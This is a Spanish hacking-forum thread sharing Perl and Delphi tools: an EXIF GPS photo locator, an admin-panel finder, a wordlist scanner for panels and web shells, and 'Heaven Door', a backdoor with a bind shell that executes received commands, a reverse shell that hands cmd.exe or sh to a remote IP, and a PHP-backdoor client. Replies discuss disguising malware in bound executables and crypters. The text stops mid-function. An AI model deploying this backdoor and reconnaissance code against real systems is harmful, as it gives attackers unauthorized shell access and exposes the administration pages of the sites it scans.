Noticias Informáticas / Re:FBI Arresta al creador de Nanocore RAT
« en: Abril 05, 2017, 08:59:25 am »
Espero que no sea el mismo aeonhack que hizo los skins de C# que publiqué en este mismo foro.
#!usr/bin/perl
# DH Image Locate 0.3
#(C) Doddy Hackman 2016
use Image::ExifTool;
use Getopt::Long;
use Color::Output;
Color::Output::Init;

# Every switch takes the path of the image to work on.
GetOptions(
    "dump_all=s"      => \$dump_all,
    "dump_gps_tags=s" => \$dump_gps_tags,
    "locate=s"        => \$locate
);

head();

# Only the first switch that was supplied is honoured. Its value has to name
# an existing regular file; otherwise the miss is reported and the script
# goes straight to the footer.
if ($dump_all) {
    if ( !-f $dump_all ) {
        printear("[-] File not found\n");
    }
    else {
        printear_titulo("[+] Finding information in : ");
        print "$dump_all\n\n";
        dump_all($dump_all);
    }
}
elsif ($dump_gps_tags) {
    if ( !-f $dump_gps_tags ) {
        printear("[-] File not found\n");
    }
    else {
        printear_titulo("[+] Finding GPS tags in : ");
        print "$dump_gps_tags\n\n";
        dump_gps_tags_and_locate( $dump_gps_tags, "0" );
    }
}
elsif ($locate) {
    if ( !-f $locate ) {
        printear("[-] File not found\n");
    }
    else {
        printear_titulo("[+] Scanning photo : ");
        print "$locate\n\n";
        dump_gps_tags_and_locate( $locate, "1" );
    }
}
else {
    sintax();
}

# Prints the footer and ends the process (copyright() calls exit).
copyright();
# Functions
# Print every tag ExifTool extracts from the image as "[+] tag : value",
# in the order GetFoundTags("Group0") returns them.
# The values are taken from the file's metadata and written to the terminal
# unfiltered, so treat the output as untrusted text when the image comes
# from an unknown source.
sub dump_all {
    my ($imagen_target) = @_;

    my $exif  = Image::ExifTool->new;
    my $datos = $exif->ImageInfo($imagen_target);

    foreach my $etiqueta ( $exif->GetFoundTags("Group0") ) {
        printear("[+] $etiqueta : ");
        print $datos->{$etiqueta}, "\n";
    }
}
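# Print the GPS tags of an image and, when $locate is "1", turn the
# GPSPosition tag into a Google Maps search URL.
#
# Arguments:
#   $imagen_target - path of the image to read
#   $locate        - "1" to build the map URL and offer to open it in the
#                    browser; any other value only lists the tags
#
# Every tag value comes from the image's metadata, i.e. it is chosen by
# whoever produced the file. The position string ends up inside a shell
# command line, so it is checked against a strict character set before the
# browser is started; a value that fails the check is only printed.
sub dump_gps_tags_and_locate {
    my ( $imagen_target, $locate ) = @_;

    my $datos_imagen       = Image::ExifTool->new;
    my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
    my $posicion_real      = $informacion_imagen->{GPSPosition};

    # Label / value pairs in the order they are reported.
    my @campos = (
        [ "Latitude",  $informacion_imagen->{GPSLatitude} ],
        [ "Longitude", $informacion_imagen->{GPSLongitude} ],
        [ "Altitude",  $informacion_imagen->{GPSAltitude} ],
        [ "DateTime",  $informacion_imagen->{GPSDateTime} ],
        [ "Position",  $posicion_real ],
    );

    for my $campo (@campos) {
        my ( $etiqueta, $valor ) = @{$campo};

        # Each tag is tested on its own value (the altitude line used to be
        # keyed on the latitude), and a missing tag is undef, not "".
        if ( defined $valor && $valor ne "" ) {
            printear("[+] $etiqueta : ");
            print $valor . "\n";
        }
        else {
            printear("[-] $etiqueta : ");
            print "Not Found" . "\n";
        }
    }

    my $finder_ready =
      ( defined $posicion_real && $posicion_real ne "" ) ? 1 : 0;

    if ( $locate eq "1" ) {
        if ($finder_ready) {

            # Strip ExifTool's degree/minute/second decoration.
            my $gps_split = $posicion_real;
            $gps_split =~ s/deg//g;
            $gps_split =~ s/'//g;
            $gps_split =~ s/"//g;
            $gps_split =~ s/W//g;
            $gps_split =~ s/N,/-/g;

            # NOTE(review): as written this replaces a space with a space;
            # the page's whitespace may have been collapsed. Kept unchanged.
            $gps_split =~ s/ / /g;

            my $url =
              "https://www.google.com.ar/maps/search/" . $gps_split . "/";

            # Digits, hemisphere letters, space, dot, comma and sign are all
            # a cleaned coordinate pair needs. Anything else (quotes, &, |,
            # %, ...) must never reach the shell.
            my $posicion_segura = $gps_split =~ /\A[0-9NSEW .,+\-]*\z/ ? 1 : 0;

            printear_titulo("\n[!] Position Located\n\n");
            printear("[+] GPS : ");
            print $gps_split . "\n";
            printear("\n[?] Open in browser [y,n] : ");
            chomp( my $rta = <STDIN> );

            my $quiere_abrir = ( defined $rta && $rta =~ /y/i ) ? 1 : 0;

            if ( $quiere_abrir && $posicion_segura ) {
                printear_titulo("\n[+] Enjoy the program !\n");
                system( "start firefox \"" . $url . "\"" );
            }
            else {
                if ($quiere_abrir) {
                    printear(
"\n[-] Position has unexpected characters, browser not started\n"
                    );
                }
                printear("\n[+] GoogleMaps : ");
                print $url . "\n";
            }
        }
        else {
            printear_titulo("\n[-] Position GPS not available");
        }
    }
}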
# More Functions
# Print the text with Color::Output colour code 6, then switch back to 0.
sub printear {
    my ($texto) = @_;
    return cprint( join q{}, "\x036", $texto, "\x030" );
}
# Print the text with Color::Output colour code 7, then switch back to 0.
sub printear_logo {
    my ($texto) = @_;
    return cprint( join q{}, "\x037", $texto, "\x030" );
}
# Print the text with Color::Output colour code 10, then switch back to 0.
sub printear_titulo {
    my ($texto) = @_;
    return cprint( join q{}, "\x0310", $texto, "\x030" );
}
# Print the usage text, then the footer; copyright() ends the process, so
# this sub does not return to its caller.
sub sintax {
    printear("[+] Sintax : ");
    print "perl $0 <option> <value>\n";

    printear("\n[+] Options : \n\n");
    print
      "-dump_all <image> : Get all information of a image\n",
      "-dump_gps <image> : Get all tags GPS of a image\n",
      "-locate <image> : Locate Image in GoogleMaps\n";

    printear("\n[+] Example : ");
    print "perl dh_image_locate.pl -dump_all test.jpg\n";

    copyright();
}
# Print the program banner.
sub head {
    my $banner = "\n-- == DH Image Locate 0.3 == --\n\n\n";
    printear_logo($banner);
}
# Print the footer and end the process. The exit status is 1 on every path,
# including a run that completed normally, so the status cannot be used to
# tell success from failure.
sub copyright {
    my $pie = "\n\n-- == (C) Doddy Hackman 2016 == --\n\n";
    printear_logo($pie);
    exit(1);
}
#The End ?
me pueden conseguir el ircplus para poder practicarlo
Gracias, aun no se me ocurre en que utilizarlo, pero lo tendre xD
Lo podes usar en un ejecutable bindeado para que tenga el peso original del programa que tratas de imitar cuando ocultas el malware.
Genial, aunque creo ya no sirven los crypters hoy en dia, o si?
Gracias, aun no se me ocurre en que utilizarlo, pero lo tendre xD
// Admin Finder 1.0
// (C) Doddy Hackman 2016
unit finder;
interface
uses
Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
System.Classes, Vcl.Graphics,
Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ExtCtrls, Vcl.StdCtrls,
Vcl.ComCtrls, idHTTP, OtlThreadPool, OtlComm, OtlTask,
OtlTaskControl, Vcl.Imaging.pngimage;
type
// Main form of the tool. The component fields below are bound to the form
// resource that the {$R *.dfm} directive in this unit links in.
TFormHome = class(TForm)
imgLogo: TImage;
gbEnterConfiguration: TGroupBox;
lblPage: TLabel;
lblThreads: TLabel;
// Base address that btnStartClick prefixes to every built-in path.
txtPage: TEdit;
// Read with StrToInt in btnStartClick and multiplied by the CPU count.
txtThreads: TEdit;
udThreads: TUpDown;
gbConsole: TGroupBox;
// Receives one line per address that check_page reported as found.
mmOutput: TMemo;
btnStart: TButton;
btnStop: TButton;
// Panel 0 carries the progress / state text.
status: TStatusBar;
procedure btnStopClick(Sender: TObject);
procedure btnStartClick(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
FormHome: TFormHome;
implementation
{$R *.dfm}
// Functions
// Show a modal Windows message box owned by the main form.
// type_message selects the icon: 'Information', 'Warning', 'Question' or
// 'Error'; any other non-empty value falls back to the information icon.
// Returns '[+] MessageBox : OK' once the box has been shown, and
// '[-] Error' when an argument is empty or the call raises.
function message_box(title, message_text, type_message: string): string;
var
  icon_flag: UINT;
begin
  Result := '[-] Error';

  // All three arguments are mandatory.
  if (title = '') or (message_text = '') or (type_message = '') then
    Exit;

  if type_message = 'Warning' then
    icon_flag := MB_ICONWARNING
  else if type_message = 'Question' then
    icon_flag := MB_ICONQUESTION
  else if type_message = 'Error' then
    icon_flag := MB_ICONERROR
  else
    // Covers 'Information' and every unrecognised value.
    icon_flag := MB_ICONINFORMATION;

  try
    MessageBox(FormHome.Handle, PChar(message_text), PChar(title), icon_flag);
    Result := '[+] MessageBox : OK';
  except
    Result := '[-] Error';
  end;
end;
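// Request `page` once and report whether the server answered 200.
// Returns True only for a 200 response; any other status and any exception
// (connection failure, protocol error, bad address) yields False.
// The request always carries the same fixed Firefox/25.0 User-Agent string,
// which makes this tool's traffic easy to single out in access logs.
function check_page(page: string): boolean;
var
  nave: TIdHTTP;
begin
  Result := False;
  try
    nave := TIdHTTP.Create(nil);
    try
      nave.Request.UserAgent :=
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0';
      nave.Get(page);
      Result := nave.ResponseCode = 200;
    finally
      // Release the client even when Get raises; before, the Free call was
      // skipped on every exception and the object leaked once per miss.
      nave.Free;
    end;
  except
    Result := False;
  end;
end;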
//
// Start button: for each of the 250 built-in relative paths, build
// txtPage.Text + '/' + path and schedule a pool task that calls check_page
// on it; addresses that check_page accepts are appended to mmOutput.
// The handler then pumps messages until the pool is idle and reports the
// end of the run.
// On the receiving side this is a burst of up to 250 GET requests for the
// paths below, all with the fixed User-Agent set in check_page, most of
// them answered with an error status.
procedure TFormHome.btnStartClick(Sender: TObject);
var
i: integer;
path: string;
const
// Candidate locations, relative to the base address, grouped loosely by
// technology (ASP/ASPX, PHP, HTML) and by product-specific folder names.
paths: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
'login/index.asp', 'login/index.aspx', 'login/login.asp',
'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
'administracion/index.asp', 'administracion/index.aspx',
'administracion/login.asp', 'administracion/login.aspx',
'administracion/webmaster.asp', 'administracion/webmaster.aspx',
'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php',
'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php',
'administracion/', 'administracion/index.php', 'administracion/login.php',
'administracion/ingresar.php', 'administracion/admin.php',
'administration/', 'administration/index.php', 'administration/login.php',
'administrator/index.php', 'administrator/login.php',
'administrator/system.php', 'system/', 'system/login.php', 'admin.php',
'login.php', 'administrador.php', 'administration.php', 'administrator.php',
'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php',
'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/',
'admin/account.php', 'admin/account.html', 'admin/index.html',
'admin/login.html', 'admin/home.php', 'admin/controlpanel.html',
'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html',
'cp.php', 'cp.html', 'administrator/', 'administrator/index.html',
'administrator/login.html', 'administrator/account.html',
'administrator/account.php', 'administrator.html', 'login.html',
'modelsearch/login.php', 'moderator.php', 'moderator.html',
'moderator/login.php', 'moderator/login.html', 'moderator/admin.php',
'moderator/admin.html', 'moderator/', 'account.php', 'account.html',
'controlpanel/', 'controlpanel.php', 'controlpanel.html',
'admincontrol.php', 'admincontrol.html', 'adminpanel.php',
'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp',
'yonetici.asp', 'admin/account.asp', 'admin/home.asp',
'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
'administrator/index.asp', 'administrator/login.asp',
'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/',
'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/',
'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/',
'admin4_colon/', 'radmind1/', 'SuperAdmin/', 'AdminTools/', 'cmsadmin/',
'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/',
'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/',
'database_administration/', 'power_user/', 'system_administration/',
'ss_vms_admin_sm/');
begin
// Both fields must be filled in; nothing else about them is validated.
if not(txtPage.Text = '') and not(txtThreads.Text = '') then
begin
// NOTE(review): StrToInt raises on non-numeric text and the call is not
// guarded here.
GlobalOmniThreadPool.MaxExecuting := StrToInt(txtThreads.Text) *
System.CPUCount;
status.Panels[0].Text := '[+] Scanning ...';
FormHome.Update;
for i := Low(paths) to High(paths) do
begin
Application.ProcessMessages;
path := txtPage.Text + '/' + paths[i];
// The address is handed over as a task parameter rather than captured,
// so each task works on its own copy.
CreateTask(
procedure(const task: IOmniTask)
var
path_to_load: string;
begin
path_to_load := task.Param['path'].AsString;
// NOTE(review): status and mmOutput are VCL controls and are touched
// here from the task body, which presumably runs on a pool thread;
// VCL access from worker threads is not safe - confirm and marshal
// to the main thread if so.
status.Panels[0].Text := 'Checking : ' + path_to_load + ' ...';
FormHome.Update;
if (check_page(path_to_load)) then
begin
mmOutput.Lines.Add(path_to_load);
end;
end).SetParameter('path', path).Unobserved.Schedule;
end;
// Busy-wait, keeping the UI responsive, until nothing is running or queued.
while GlobalOmniThreadPool.CountExecuting +
GlobalOmniThreadPool.CountQueued > 0 do
begin
Application.ProcessMessages;
end;
status.Panels[0].Text := '[+] Finished';
FormHome.Update;
message_box('Admin Finder 1.0', 'Scan Finished', 'Information');
end
else
begin
message_box('Admin Finder 1.0', 'Complete the configuration', 'Warning');
end;
end;
// Stop button: call CancelAll on the global OmniThreadLibrary pool, show
// the stopped state in the status bar and confirm with a message box.
procedure TFormHome.btnStopClick(Sender: TObject);
const
  APP_TITLE = 'Admin Finder 1.0';
  STOPPED_TEXT = '[+] Stopped';
begin
  GlobalOmniThreadPool.CancelAll;

  status.Panels[0].Text := STOPPED_TEXT;
  FormHome.Update;

  message_box(APP_TITLE, 'Scan Stopped', 'Information');
end;
end.
// The End ?
# !usr/bin/perl
# DH Secret Finder 0.8
# (C) Doddy Hackman 2016
# Credits for the arrays :
# Dirs : directory-list-2.3-small.txt - Copyright 2007 James Fisher
# Files : Based in wfuzz-1.4
# Link for Files : https://raw.githubusercontent.com/tuwid/darkc0de-old-stuff/master/wfuzz-1.4/wordlists/common.txt
# Shells : Based in https://github.com/bhavyanshu/Shell-Finder
use LWP::UserAgent;
use Getopt::Long;
use Color::Output;
Color::Output::Init;

# Five mode flags, the target (-url), an optional log file and a verbosity
# flag. $savefile and $verbose stay package variables because search()
# reads them directly.
GetOptions(
    "panels"     => \$panels,
    "domains"    => \$domains,
    "dirs"       => \$dirs,
    "files"      => \$files,
    "shells"     => \$shells,
    "url=s"      => \$url,
    "savefile=s" => \$savefile,
    "verbose"    => \$verbose
);

head();

# Mode flags in priority order, each paired with the type name search()
# expects. The first flag that is set decides the mode.
my @modos = (
    [ $panels,  "panel" ],
    [ $domains, "domain" ],
    [ $dirs,    "dir" ],
    [ $files,   "file" ],
    [ $shells,  "shell" ],
);
my ($elegido) = grep { $_->[0] } @modos;

# A mode without -url, or no mode at all, only shows the usage text.
if ( $elegido && $url ) {
    search( $url, $elegido->[1] );
}
else {
    sintax();
}

# Prints the footer and ends the process (copyright() calls exit).
copyright();
# Functions
# Request every entry of the wordlist that belongs to $type against $url and
# report the ones check_page() accepts.
#
# Arguments:
#   $url  - target; used as a prefix ("$url/$entry") except in domain mode,
#           where each entry is prepended as a label ("$entry.$url")
#   $type - "panel", "domain", "dir", "file" or "shell"; any other value is
#           handled like "panel"
#
# Reads the package variables $verbose (also print misses) and $savefile
# (append each hit to that file). One GET is sent per wordlist line, so the
# target's access log shows the whole list, misses included.
sub search {
    my ( $url, $type ) = @_;

    my %lista_de = (
        panel  => [ "wordlists/panels.txt",      "Panels" ],
        domain => [ "wordlists/domains.txt",     "Domains" ],
        dir    => [ "wordlists/directories.txt", "Directories" ],
        file   => [ "wordlists/files.txt",       "Files" ],
        shell  => [ "wordlists/shells.txt",      "Shells" ],
    );
    my $eleccion = $lista_de{ defined $type ? $type : "" } || $lista_de{panel};
    my ( $wordlist, $name ) = @{$eleccion};

    my $cantidad = 0;

    if ( !-f $wordlist ) {
        printear_rojo("\n[-] Wordlist not exists");
    }
    else {
        printear_titulo("[+] Loading Wordlist ...\n");
        my @wordlist = load_wordlist($wordlist);
        printear("\n[+] Wordlist Loaded : ");
        print scalar(@wordlist) . " lines\n";
        printear_logo("\n[+] Searching $name in $url ...\n\n");

        for my $line (@wordlist) {
            chomp $line;

            my $link =
                $type eq "domain"
              ? $line . "." . $url
              : $url . "/" . $line;

            if ( check_page($link) ) {
                if ($verbose) {
                    printear("[+] Checking ");
                    printear_logo("$link : ");
                    printear_azul("OK\n");
                }
                else {
                    printear_azul("[+] Link : $link\n");
                }
                $cantidad++;
                savefile( $savefile, "[+] Link : $link" ) if $savefile;
            }
            elsif ($verbose) {
                printear("[+] Checking ");
                printear_logo("$link : ");
                printear_rojo("FAIL\n");
            }
        }

        printear("\n[+] $name Found : ");
        print "$cantidad\n";
        printear("\n[-] $name not found\n") if $cantidad == 0;
        printear_logo("\n[+] Logs $savefile saved\n") if $savefile;
        printear_titulo("\n[+] Finished\n");
    }
}
# More Functions
# Fetch $url once and return 1 when LWP counts the final response as a
# success, 0 otherwise. Uses a 10 second timeout and a fixed User-Agent
# string, which is what makes this tool's requests stand out in logs.
# NOTE(review): hostname and certificate verification are both switched off
# in ssl_opts, so for https targets a reply from any endpoint on the path is
# accepted; a hit is not proof that the named host served the page.
# IO::Socket::SSL is named here but no use line for it is visible in this
# script's header.
sub check_page {
    my ($url) = @_;

    my $nave = LWP::UserAgent->new(ssl_opts => {verify_hostname => 0,SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE});
    $nave->agent(
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
    );
    $nave->timeout(10);

    my $respuesta = $nave->get($url);
    return $respuesta->is_success ? 1 : 0;
}
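# Read a wordlist file and return its lines (line endings kept; the caller
# chomps them).
#
# Argument: path of the file.
# Returns:  the list of lines, or an empty list when the file cannot be
#           opened (a warning is printed in that case).
#
# The file is opened with three-argument open and an explicit read mode, so
# the name is always taken literally; with the two-argument form a name
# ending in "|" or starting with ">" would have been read as a pipe or a
# write mode instead of a file name.
sub load_wordlist {
    my ($ruta) = @_;
    my @result;

    if ( open( my $fh, '<', $ruta ) ) {
        @result = <$fh>;
        close $fh;
    }
    else {
        warn "load_wordlist: cannot open '$ruta': $!\n";
    }

    return (@result);
}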
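# Append $text plus a newline to $filename.
#
# Returns a true value when the line was written and the file closed
# cleanly, false otherwise (a warning explains why).
#
# $filename comes from the -savefile option. Three-argument open keeps it a
# plain file name: nothing in it is interpreted as part of the open mode and
# surrounding whitespace is not trimmed.
sub savefile {
    my ( $filename, $text ) = @_;

    open( my $fh, '>>', $filename ) or do {
        warn "savefile: cannot open '$filename': $!\n";
        return;
    };

    print {$fh} $text . "\n";

    # Buffered write errors only surface at close time.
    my $ok = close $fh;
    warn "savefile: cannot close '$filename': $!\n" unless $ok;
    return $ok;
}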
# Print the text with Color::Output colour code 6, then switch back to 0.
sub printear {
    my ($texto) = @_;
    return cprint( join q{}, "\x036", $texto, "\x030" );
}
# Print the text with Color::Output colour code 7, then switch back to 0.
sub printear_logo {
    my ($texto) = @_;
    return cprint( join q{}, "\x037", $texto, "\x030" );
}
# Print the text with Color::Output colour code 10, then switch back to 0.
sub printear_titulo {
    my ($texto) = @_;
    return cprint( join q{}, "\x0310", $texto, "\x030" );
}
# Print the text with Color::Output colour code 5, then switch back to 0.
sub printear_rojo {
    my ($texto) = @_;
    return cprint( join q{}, "\x035", $texto, "\x030" );
}
# Print the text with Color::Output colour code 3, then switch back to 0.
sub printear_azul {
    my ($texto) = @_;
    return cprint( join q{}, "\x033", $texto, "\x030" );
}
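# Print the usage text, then the footer; copyright() ends the process, so
# this sub does not return to its caller.
# The text now matches what GetOptions registers: the option names are
# spelled out in full, -verbose is listed, and the example passes the target
# through -url (without it the script only prints this text again).
sub sintax {
    printear("[+] Sintax : ");
    print "perl $0 <option> <value>\n";
    printear("\n[+] Options : \n\n");
    print "-panels -url <url> : Find panel administration in the URL\n";
    print "-domains -url <url> : Find domains in the URL\n";
    print "-dirs -url <url> : Find directories in the URL\n";
    print "-files -url <url> : Find files in the URL\n";
    print "-shells -url <url> : Find shells in the URL\n";
    print "-savefile <filename> : Save results\n";
    print "-verbose : Show every checked link\n";
    printear("\n[+] Example : ");
    print
"perl secret_finder.pl -shells -url http://localhost/ -savefile results.txt\n";
    copyright();
}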
# Print the program banner.
sub head {
    my $banner = "\n-- == DH Secret Finder 0.8 == --\n\n\n";
    printear_logo($banner);
}
# Print the footer and end the process. The exit status is 1 on every path,
# including a run that completed normally.
sub copyright {
    my $pie = "\n\n-- == (C) Doddy Hackman 2016 == --\n\n";
    printear_logo($pie);
    exit(1);
}
#The End ?
# !usr/bin/perl
# Heaven Door 1.0
# (C) Doddy Hackman 2016
use LWP::UserAgent;
use MIME::Base64;
use IO::Socket;
use IO::Socket::SSL;
use Cwd;
use Getopt::Long;
use Color::Output;
Color::Output::Init;
# Four modes are selectable:
#   -backdoor -port <port>                  TCP listener that executes what it receives
#   -reverse -ip <ip> -port <port>          outbound connection that hands over a shell
#   -generate_backdoor -filename <file>     writes the PHP stub to a file
#   -connect_backdoor -url <url>            HTTP client for that stub
GetOptions(
"backdoor" => \$backdoor,
"reverse" => \$reverse,
"ip=s" => \$ip,
"port=s" => \$port,
"generate_backdoor" => \$generate_backdoor,
"filename=s" => \$filename,
"connect_backdoor" => \$connect_backdoor,
"url=s" => \$url
);
head();
# First mode flag that is set wins; a mode whose required values are missing
# falls back to the usage text.
if ($backdoor) {
if($backdoor && $port) {
backdoor($port);
} else {
sintax();
}
}
elsif ($reverse) {
if($reverse && $ip && $port) {
reverse_shell($ip,$port);
} else {
sintax();
}
}
elsif ($generate_backdoor) {
if($filename) {
cargar_generador_backdoor($filename);
} else {
sintax();
}
}
elsif ($connect_backdoor) {
if($url) {
cargar_consola_backdoor($url);
} else {
sintax();
}
}
else {
sintax();
}
# Prints the footer and ends the process (copyright() calls exit).
copyright();
# Functions
# Simple backdoor
# Bind listener. Accepts TCP connections on $port and, for every line a
# client sends, runs that line through qx() and writes the output back.
# Nothing in this sub authenticates the peer or encrypts the stream, so any
# host that can reach the port gets command execution as the account that
# runs the script.
#
# Defender notes:
#  - The greeting sent right after accept() is a fixed text
#    ("[+] Heaven_Door : Online", a literal port 25256 whatever $port is,
#    then "Welcome <peer address>"), which makes it usable as a network
#    signature.
#  - The prompt is the script's working directory followed by ">>".
#  - On the host this is a perl process that owns a listening TCP socket and
#    spawns a child process per received line.
sub backdoor {
my($port) = @_;
$backdoor = IO::Socket::INET->new(Proto=> 'tcp',LocalPort =>$port,Listen=> SOMAXC,Reuse=> 1);
printear("[+] Heaven_Door : ");
print "Online\n";
printear("[+] Port : ");
print "$port\n";
printear("[+] PID : ");
print "$$\n\n";
printear_titulo("[+] Connected");
# One client at a time: the inner read loop runs until that client closes.
while ($jesus = $backdoor->accept()) {
$jesus->autoflush(1);
print $jesus "[+] Heaven_Door : Online\n[+] Port : 25256\n[+] PID : ".$$."\n\n";
print $jesus "Welcome ".$jesus->peerhost."\n\n";
&extras;
$dir = getcwd();
print $jesus $dir.">>";
while (<$jesus>) {
# The received line goes to the shell exactly as sent.
my $yeah = qx($_);
print $jesus "\n\n".$yeah."\n\n";
print $jesus $dir.">>";
}
}
# Host details sent to the client on connect: domain, OS name and login on
# Windows (via the Win32 module), `uname -a` output elsewhere. Named subs
# are package-scoped in Perl, so this definition is not private to
# backdoor() although it is written inside its braces; it reads the
# package variable $jesus.
sub extras {
if ($^O =~/Win32/ig) {
use if $^O eq "MSWin32", "Win32";
print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
print $jesus "[+] Username : ".Win32::LoginName()."\n\n";
} else {
$output = `uname -a`;
print $jesus "--==System Info==--\n\n".$output."\n";
}
}
}
#
# Reverse Shell
# Outbound shell. Connects to $ip:$port, re-opens STDIN, STDOUT and STDERR
# onto that socket and calls tipo(), which starts the platform shell; from
# then on the remote end drives the shell over the plain TCP connection.
#
# Defender notes:
#  - Host side: a perl process with an established outbound TCP connection
#    whose child is cmd.exe or "sh -i" and whose standard handles are that
#    socket.
#  - Network side: the first bytes sent are the host details printed by
#    infowin()/infolinux(), in clear text.
#  - Egress filtering to unexpected destinations and ports stops this mode.
sub reverse_shell {
my($ip,$port) = @_;
printear_titulo("[+] Reverse Shell : ");
print "Loaded\n\n";
printear("[+] IP to connect : ");
print $ip."\n";
printear("[+] Port : ");
print $port."\n\n";
printear_logo("[+] Connecting ...\n\n");
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($port,inet_aton($ip)));
printear_titulo("[+] Reverse Shell successful\n\n");
# From here on everything the process reads or prints goes through the socket.
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
tipo();
printear_logo("[+] Disconnecting ...\n\n");
}
# Print the host details and start an interactive shell for the current
# platform: cmd.exe when $^O matches Win32, otherwise "sh -i" with
# TERM=xterm. The shell inherits whatever STDIN/STDOUT/STDERR the caller
# has set up.
sub tipo {
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
system("export TERM=xterm;exec sh -i");
}
}
# Print domain name, OS name and login name, obtained from the Win32 module.
# The module is loaded at compile time and only when $^O is "MSWin32".
sub infowin {
use if $^O eq "MSWin32", "Win32";
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n";
}
# Print a heading followed by the output of `uname -a`.
sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n";
}
#
# More Functions
# Interactive client for the PHP stub written by generar_backdoor().
# It first sends two probe commands ("ver" and "uname -a") and continues
# only if one of the replies carries the [code_heaven] markers; after that
# it reads commands from the terminal in a loop, sends each one with
# cargar_comando() and prints what comes back between the markers.
# A command containing "exit" ends the program.
# The two probes use the file-level $url; the argument is unpacked into a
# lexical $url only afterwards and is what the loop uses.
#
# Defender note: every session therefore starts with two requests to the
# same URL whose heaven_door_here cookie holds "ver" and "uname -a".
sub cargar_consola_backdoor {
printear("[+] Checking Backdoor ...\n\n");
my $check1 = cargar_comando($url,"ver");
my $check2 = cargar_comando($url,"uname -a");
if(check_backdoor($check1) or check_backdoor($check2)) {
printear_logo("[+] Backdoor Loaded\n");
my($url) = @_;
while(1) {
printear("\n[+] Command : ");
chomp( my $comando = <stdin> );
if ( $comando =~ /exit/ ) {
copyright();
}
my $code = cargar_comando($url,$comando);
if(check_backdoor($code)) {
my $output = extract_command_backdoor($code);
if($output ne "") {
printear_titulo("\n".$output."\n");
} else {
printear_titulo("\n"."[-] Invalid command"."\n");
}
} else {
printear_titulo("\n"."[-] Invalid command"."\n");
}
}
} else {
printear_logo("[+] Backdoor not exists\n");
}
}
# Return 1 when $text contains a [code_heaven]...[/code_heaven] pair (the
# wrapper the PHP stub puts around its output), 0 otherwise. The /s flag
# lets the wrapped part span several lines.
sub check_backdoor {
    my ($text) = @_;
    return $text =~ /\[code\_heaven\](.*?)\[\/code\_heaven\]/s ? 1 : 0;
}
# Return the text between the first [code_heaven] marker and the nearest
# [/code_heaven] after it, or "" when $text has no such pair.
sub extract_command_backdoor {
    my ($text) = @_;
